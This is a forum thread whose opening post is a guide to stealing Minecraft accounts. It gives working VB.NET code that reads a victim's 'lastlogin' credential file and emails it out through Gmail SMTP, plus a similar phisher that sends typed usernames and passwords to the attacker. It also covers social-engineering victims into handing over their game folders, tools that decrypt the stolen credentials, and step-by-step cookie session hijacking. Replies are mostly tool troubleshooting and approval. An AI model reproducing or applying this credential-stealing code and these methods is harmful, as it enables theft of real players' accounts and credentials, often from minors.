Post: -Minecraft Account Hacking-
11-03-2011, 10:45 PM #1
(adsbygoogle = window.adsbygoogle || []).push({});
You must login or register to view this content.




-This guide is now completely outdated. I do not plan on ever updating it.
-Removed the videos. Don't plan on making more anytime soon.
-Removed space that was causing problems for so many. Not Happy or Sad
-Updated FAQ & other small edits.
-Adding a new section: Cookie Session Stealing. A truly original Minecraft hack I found.
-Minecraft Account Hacking - Part 3 was uploaded.

-Minecraft Account Hacking - Part 2 was uploaded.
-Version two of the video was uploaded.
-Just finished the video. Uploading now.
-The much needed FAQ section has been added.

[/SIZE]



Hacking Minecraft accounts is something I have been perfecting for a while now. After a ton of experience and research I have narrowed down the most effective ways to "hack" a Minecraft account. This guide is good for either targeting someone or for just gathering alternate accounts. It is also the next best thing to using a account cracker. Lets begin.







This guide is now outdated. Nothing to see here unless you want a history lesson.













You must login or register to view this content.

Obtaining a "Lastlogin" File


The key to stealing any Minecraft account is obtaining a file named "lastlogin". This file is located in the .minecraft folder which contains all of the games files.

If you don't have minecraft on your computer you will need to use the cracked version in the download. (You will find out why later.)

You must login or register to view this content.




Method #1

The first way you can obtain a lastlogin file is to simply search it on the internet. Some people foolishly post their .minecraft folder on the internet for several reasons without removing their lastlogin file.


Some things you can search to find a .minecraft folder:


  • Premodded Minecraft Folder
  • Free .minecraft folder
  • Play minecraft for free with this last loginfile




Method #2

The social engineering method. This method worked well for me. By befriending people on the You must login or register to view this content. you can convince them to send you their .minecraft folder by saying you will...


  • Make incompatible mods work together
  • Mod their .minecraft folder
  • That you want to try out their modded .minecraft folder
  • ect...


The great thing about this is that you don't even need the greatest social engineering skills. You only need to know what your talking about. So brush up on your info about the mechanics of the game.




Method #3

The last method is using a program that steals the file for you. Here is an example code that you may use.


VB.NET Example


    
Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
MyMailMessage.Attachments.Add(Attch)
MyMailMessage.From = New MailAddress([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.To.Add([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.Subject = ("LastLoginFile")
MyMailMessage.Body = (" ")
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential([COLOR="#FF0000"]"[email protected]"[/COLOR], [COLOR="#FF0000"]"Password"[/COLOR])
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub

End Class













You must login or register to view this content.

How to use the "lastlogin" file to steal their account
[/COLOR]

Mine Pass
Created by: Unknown

Now in the download you should see a cracked minecraft launcher. This will give you the game. Then go You must login or register to view this content. to download the original launcher so you can log in. It will be under "Download Minecraft". (If you already have the game you can skip this step.)

Now you need to take the "lastlogin" file you have and place it in your .minecraft folder. Which is located in in your %AppData% folder.

Now open up the non cracked launcher. You should see this:
(If not then the user was smart enough to leave it blank.)

You must login or register to view this content.


Now open up Mine Pass in the download. Then click log in on the launcher. Mine Pass will do its job and show you this:


You must login or register to view this content.




MC Last Login Decrypter (LLD)
Created by: Wertyl11

This is very simple just run the .jar and it will display the information. May not work for everyone.

You must login or register to view this content.




Now you have the information you need to take the account for your self. If your lucky you can search the victims user name, find their email and take it.











You must login or register to view this content.

Making an Effective Phisher
[/COLOR]

These ideas can be applied to Method #3 of Part 1.

This method requires that you know VB, or at least how to use a code given to you. This method, even though it's illegal, can be a effective. Yes its the infamous phisher.

When you make a phisher on the minecraft forums, or where ever, make it look real. Have tons of pictures and don't forget to add "why it may not work for every one". This way no suspicion comes about. Also make a second account and reply to your phishers thread saying it was great. This first post will be enough for many to download it and to fall for your trap. Lastly be creative. Think big! It doesn't have to work. Just has to look like it does.

Here is a code you can use:

Pass is what you would use for a text box.

    
Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)

Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("[COLOR="#FF0000"]Your Gmail Here[/COLOR]@gmail.com")
MyMailMessage.To.Add("[COLOR="#FF0000"]Your Gmail Here[/COLOR]")
MyMailMessage.Subject = User.Text
MyMailMessage.Body = Pass.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("[COLOR="#FF0000"]Your Gmail Here[/COLOR]", "[COLOR="#FF0000"]Your Gmail's Password Here[/COLOR]")
SMTP.Send(MyMailMessage)
Pass.Text = ""
Catch ex As Exception
End Try
End Sub


Again this does require that you have some programming skills.








You must login or register to view this content.

Minecraft Browser Session Stealing
[/COLOR]

The concept of session stealing with cookies is not a new one, but as far as minecraft goes this is new ground. I will be adding more as I discover more. For this the target must be logged into minecraft from their browser. This can be applied to other browsers, but today I will be showing you how to do it with Google Chrome.


From Target's Computer


You must login or register to view this content.


  1. First make sure the target is logged in.
  2. Then go to the Chrome Web Store.
  3. Search and add the Extension "Edit This Cookie".
  4. Then go to minecraft.net where the target should still be logged in.
  5. Click on the cookie in the top right hand corner.
  6. Click export cookies. It will copy the cookies to your clip board.
  7. Now paste those cookies into a txt file on a flash drive, or email it to yourself.
  8. Now you need to be on your computer. Install that same extension into chrome.
  9. Now click the cookie and select import. Paste the cookies there.
  10. Now click Submit cookie changes.
    You may need to refresh the page.

  11. Now you should be logged into their account. Where you are free to play the game under their account.


You must login or register to view this content.




Please Read:

If the person logs out of minecraft on their computer before you can login, then the cookies will be invalid.








FAQ



Technical FAQ

Can you hack an account for me MagicalMonkey? No.

Mine Pass just says it scanning and does nothing else. Why won't it work? You need to press log in.

Mine Pass does not display a password/username. Why? Because the owner of the account did not select remember password, or it is simply a blank last login file.

The account information I have does not work? Probably because the owner changed his information.

I get weird results with Mine Pass when I login. Why? I'll just say this. If you can't log into Minecraft with just the last log in file alone, then the file is no good and contains incorrect information.

I can not find my .minecraft folder. Why? Probably because Minecraft is not on your computer. So use the cracked launcher provided in the download in order to get a free copy.

Can I have the project folder for the Lastlogin file stealer/Phisher? No. I refuse to spoon feed any one. I have literally given you the entire code and all you need to do is copy and paste.

I can't find any last login files through a google search. Why not? I created this thread over a year ago just before the Minecraft Account Hacking Boom started. (Obviously, I have continued to update it quite often.) At the time there were less MC account hackers out there. So it was easier to find things like this. So the chances that you will find one laying around the internet any more is slim, but it doesn't mean it can't happen.



Irrelevant FAQ

MagicalMonkey, I don't like you, because you show people how to hack Minecraft accounts. Can you stop now!? No. lol

MagicalMonkey, I bet you're just a skid who copied all of this from someone else. Unlike a lot of very unintelligent people, I do not plagiarize other people's work. If I borrowed something from someone else, I posted it here.

Hey I think you are awesome. Is there anyway I can thank-you? Yeah! Let me know that I helped and share it with your friends. I would also like it if you thanked KronosCloud for making the MC ToolBox.










Downloads


Download the Minecraft Account Hackers Tool Kit You must login or register to view this content..

Includes a cracked version of Minecraft, LLD and MinePass.


Minecraft Toolbox
By You must login or register to view this content.

Download the You must login or register to view this content.. It is basically all of the programs put into one tool. I highly suggest you try this first.

Direct Download Link: You must login or register to view this content.
Google Chrome will set off a false positive.

Virus Scan: You must login or register to view this content.

You must login or register to view this content.





Do not contact me about sending you the link for the downloads. Register here at NGU to get all of the links, videos and downloads. It is free to sign up and it is a great community. If you do however try to contact me about getting the downloads without signing up for NGU I will ignore you. I get asked far too often and wanted to state this before it got out of hand.[/CENTER]
Last edited by MagicalMonkey ; 03-05-2014 at 10:26 PM.

The following 21 users say thank you to MagicalMonkey for this useful post:

CraigMurray95, Curt, FruitBurst, IVisionsI, jobush50, LEzStarz, mister_k, Mr Grumpy, Mr. Star, Ninja, R3bUG-_M0Dz_-, Rasil23, Repetition, Taylor, wiseguy48, xChidori, xSoulEdge, Ziom230
08-04-2012, 02:32 AM #110
Originally posted by gogo5565 View Post
it keeps saying i cant detail:See the end of this message for details on invoking
just-in-time (JIT) debugging instead of this dialog box.

************** Exception Text **************
System.Net.WebException: An exception occurred during a WebClient request. ---> System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\temp\pass.exe'.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access)
at System.Net.WebClient.DownloadFile(Uri address, String fileName)
--- End of inner exception stack trace ---
at System.Net.WebClient.DownloadFile(Uri address, String fileName)
at Minecraft_Toolbox.Form1.MPass()
at Minecraft_Toolbox.Form1.ReactorButton2_Click(Object sender, EventArgs e)
at System.Windows.Forms.Control.OnClick(EventArgs e)
at System.Windows.Forms.Control.WmMouseUp(Message& m, MouseButtons button, Int32 clicks)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)


************** Loaded Assemblies **************
mscorlib
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/Microsoft.NET/Framework64/v2.0.50727/mscorlib.dll
----------------------------------------
Minecraft Toolbox
Assembly Version: 1.1.0.0
Win32 Version: 1.1.0.0
CodeBase: file:///C:/Users/mandala/Desktop/Minecraft%20ToolBox.exe
----------------------------------------
Microsoft.VisualBasic
Assembly Version: 8.0.0.0
Win32 Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.VisualBasic/8.0.0.0__b03f5f7f11d50a3a/Microsoft.VisualBasic.dll
----------------------------------------
System.Windows.Forms
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Windows.Forms/2.0.0.0__b77a5c561934e089/System.Windows.Forms.dll
----------------------------------------
System
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
----------------------------------------
System.Drawing
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4980 (win7RTMGDR.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Drawing/2.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll
----------------------------------------
Accessibility
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/Accessibility/2.0.0.0__b03f5f7f11d50a3a/Accessibility.dll
----------------------------------------
System.Runtime.Remoting
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Runtime.Remoting/2.0.0.0__b77a5c561934e089/System.Runtime.Remoting.dll
----------------------------------------
System.Configuration
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Configuration/2.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll
----------------------------------------
System.Xml
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Xml/2.0.0.0__b77a5c561934e089/System.Xml.dll
----------------------------------------

************** JIT Debugging **************
To enable just-in-time (JIT) debugging, the .config file for this
application or computer (machine.config) must have the
jitDebugging value set in the system.windows.forms section.
The application must also be compiled with debugging
enabled.

For example:

<configuration>
<system.windows.forms jitDebugging="true" />
</configuration>

When JIT debugging is enabled, any unhandled exception
will be sent to the JIT debugger registered on the computer
rather than be handled by this dialog box.


I suggest using the alternative download if you are having issues.
08-18-2012, 01:43 AM #111
nice. i think you did a great job!
08-19-2012, 06:42 PM #112
Sloth
Banned
Originally posted by gogo5565 View Post
it keeps saying i cant detail:See the end of this message for details on invoking
just-in-time (JIT) debugging instead of this dialog box.

************** Exception Text **************
System.Net.WebException: An exception occurred during a WebClient request. ---> System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\temp\pass.exe'.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access)
at System.Net.WebClient.DownloadFile(Uri address, String fileName)
--- End of inner exception stack trace ---
at System.Net.WebClient.DownloadFile(Uri address, String fileName)
at Minecraft_Toolbox.Form1.MPass()
at Minecraft_Toolbox.Form1.ReactorButton2_Click(Object sender, EventArgs e)
at System.Windows.Forms.Control.OnClick(EventArgs e)
at System.Windows.Forms.Control.WmMouseUp(Message& m, MouseButtons button, Int32 clicks)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)


************** Loaded Assemblies **************
mscorlib
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/Microsoft.NET/Framework64/v2.0.50727/mscorlib.dll
----------------------------------------
Minecraft Toolbox
Assembly Version: 1.1.0.0
Win32 Version: 1.1.0.0
CodeBase: file:///C:/Users/mandala/Desktop/Minecraft%20ToolBox.exe
----------------------------------------
Microsoft.VisualBasic
Assembly Version: 8.0.0.0
Win32 Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.VisualBasic/8.0.0.0__b03f5f7f11d50a3a/Microsoft.VisualBasic.dll
----------------------------------------
System.Windows.Forms
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Windows.Forms/2.0.0.0__b77a5c561934e089/System.Windows.Forms.dll
----------------------------------------
System
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
----------------------------------------
System.Drawing
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4980 (win7RTMGDR.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Drawing/2.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll
----------------------------------------
Accessibility
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/Accessibility/2.0.0.0__b03f5f7f11d50a3a/Accessibility.dll
----------------------------------------
System.Runtime.Remoting
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Runtime.Remoting/2.0.0.0__b77a5c561934e089/System.Runtime.Remoting.dll
----------------------------------------
System.Configuration
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Configuration/2.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll
----------------------------------------
System.Xml
Assembly Version: 2.0.0.0
Win32 Version: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Xml/2.0.0.0__b77a5c561934e089/System.Xml.dll
----------------------------------------

************** JIT Debugging **************
To enable just-in-time (JIT) debugging, the .config file for this
application or computer (machine.config) must have the
jitDebugging value set in the system.windows.forms section.
The application must also be compiled with debugging
enabled.

For example:

<configuration>
<system.windows.forms jitDebugging="true" />
</configuration>

When JIT debugging is enabled, any unhandled exception
will be sent to the JIT debugger registered on the computer
rather than be handled by this dialog box.


Make sure you have atleast .Net Framework 2 Installed if you keep having this issues PM me.
08-19-2012, 07:05 PM #113
Kherod
Be Dope, Act Dope, Stay Dope.
If my account gets hacked, I know exactly who's to blame... stare
08-20-2012, 06:22 PM #114
Sloth
Banned
Originally posted by Kherod View Post
If my account gets hacked, I know exactly who's to blame... stare


Don't worry none of the code contains anything that links back to me except the autoupdater. If you want I can post screen shots of the code?

The following user thanked Sloth for this useful post:

Kherod
08-20-2012, 10:02 PM #115
Kherod
Be Dope, Act Dope, Stay Dope.
Originally posted by KronosCloud View Post
Don't worry none of the code contains anything that links back to me except the autoupdater. If you want I can post screen shots of the code?


It's okay. It was just a joke. Smile
08-21-2012, 02:10 AM #116
Nice thread bro, nice thread... (It's time to have some fun with friend's accounts)
09-02-2012, 09:36 PM #117
Originally posted by k View Post
Nice thread bro, nice thread... (It's time to have some fun with friend's accounts)


Thanks.

Also I know a lot of you guys were expecting updates a few weeks ago, but I have been really busy lately. Hopefully it will get done soon. Smile
09-08-2012, 12:35 PM #118
Hey, thanks for the tutorial. Does anyone know if it still works?

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo